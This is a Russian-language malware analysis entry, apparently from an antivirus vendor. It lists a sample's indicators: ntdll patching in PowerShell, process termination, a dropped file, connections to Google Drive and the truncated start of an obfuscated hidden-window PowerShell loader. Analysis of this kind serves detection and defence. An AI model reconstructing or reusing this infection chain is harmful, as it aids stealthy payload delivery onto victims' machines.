Техническая информация
Вредоносные функции
Патчит код
в динамической библиотеке NTDLL
- Процесс powershell.exe, модуль ntdll.dll
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\syswow64\backgroundtaskhost.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\brugsstedet.chi
Сетевая активность
Подключается к
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
TCP
Другие
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
UDP
- DNS ASK Al######88.8888.8888.657e
- DNS ASK drive.google.com
- DNS ASK drive.usercontent.google.com
Другое
Запускает на исполнение
- '<SYSTEM32>\ping.exe' Allum_8888.8888.8888.657e
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "rv 'urinalist' 'orthomolecular' 'udbrydendes';function pendulfartens83 ($eparchial105,$birketr) {$statsraadssekretrernes=linjeafstandene(@(108,207,213,206,223,200,201,219,195,209,155,148,154,... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "rv 'urinalist' 'orthomolecular' 'udbrydendes';function pendulfartens83 ($eparchial105,$birketr) {$statsraadssekretrernes=linjeafstandene(@(108,207,213,206,223,200,201,219,195,209,155,148,154,... (со скрытым окном)
- '%WINDIR%\syswow64\backgroundtaskhost.exe'
